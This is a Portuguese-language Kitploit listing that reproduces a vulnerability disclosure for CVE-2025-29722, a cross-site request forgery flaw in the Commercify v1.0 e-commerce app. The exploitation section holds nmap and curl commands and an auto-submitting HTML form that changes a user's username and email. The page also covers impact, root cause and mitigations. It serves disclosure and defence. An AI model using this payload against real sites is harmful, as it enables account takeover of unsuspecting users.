Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-29722 — Falsificação de Solicitação entre Sites (CSRF) no Commercify v1.0 | Kitploit
Ferramentas/GitHubGitHub/cypherdavy/cve-2025-29722
ReconhecimentoAnálise de VulnerabilidadesExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubcypherdavy/cve-2025-29722

CVE-2025-29722

Falsificação de Solicitação entre Sites (CSRF) no Commercify v1.0

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ CVE-2025-29722 – Cross Site Request Forgery (CSRF) in Commercify v1.0

Descoberto por: David P.S Abraham (também conhecido como Davycipher)


ID CVE

CVE-2025-29722 foi atribuído a esta vulnerabilidade pela MITRE Corporation.


Resumo

Uma vulnerabilidade de CSRF foi identificada no Commercify v1.0, uma plataforma de e-commerce de código aberto desenvolvida por @yassmittal. O aplicativo não possui mecanismos adequados de proteção contra CSRF em endpoints críticos, como /update_settings, permitindo que atacantes criem solicitações maliciosas que modificam dados do usuário quando executadas a partir de outro domínio.


Produto Afetado

  • Nome do Produto: Commercify
  • Versão: 1.0
  • Repositório: https://github.com/yassmittal/Commercify

Tipo de Vulnerabilidade

  • CWE-352: Cross-Site Request Forgery (CSRF)

Passo a Passo de Exploração

Fase de Reconhecimento

A varredura com nmap revelou que o serviço estava acessível através da porta 5173, indicando um possível servidor de desenvolvimento.

root@kitploit:~
nmap -p 5173 localhost

Em seguida, escaneei o aplicativo usando nikto, revelando:

  • Ausência do cabeçalho X-Frame-Options
  • Política CORS permissiva (Access-Control-Allow-Origin: *)
  • Falta de cabeçalhos de proteção contra CSRF

Força Bruta em Endpoint

Ao explorar o aplicativo, suspeitei de um possível endpoint update_settings com base nos recursos do painel do usuário. Testei com:

root@kitploit:~
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"

Embora um 404 Not Found tenha sido retornado, esse comportamento pode depender do ambiente. Em implantações válidas, isso pode levar à manipulação total da conta.


Prova de Conceito (PoC)

Ataque baseado em HTML para explorar a falha de CSRF:

root@kitploit:~
<form action="http://localhost:5173/update_settings" method="POST">
  <input type="hidden" name="username" value="attacker">
  <input type="hidden" name="email" value="[email protected]">
</form>
<script>
  document.forms[0].submit();
</script>

Impacto

  • Alterações não autorizadas nos dados da conta do usuário
  • Escalação de privilégios se as configurações incluírem manipulação de função ou e-mail
  • Cenários de tomada de conta

Causa Raiz

  • Ausência de tokens CSRF
  • Atributo de cookie SameSite ausente
  • CORS permissivo (*)
  • Sem validação de referer ou origin

Mitigação e Recomendações

  • Adicione tokens CSRF em todos os endpoints que alteram estado
  • Defina SameSite=Strict ou Lax nos cookies
  • Defina políticas CORS estritas
  • Implemente validação de origin/referer

Descobridor

David P.S. Abraham
Pseudônimo: Davycipher

  • GitHub
  • LinkedIn
  • Website

Baixar ferramenta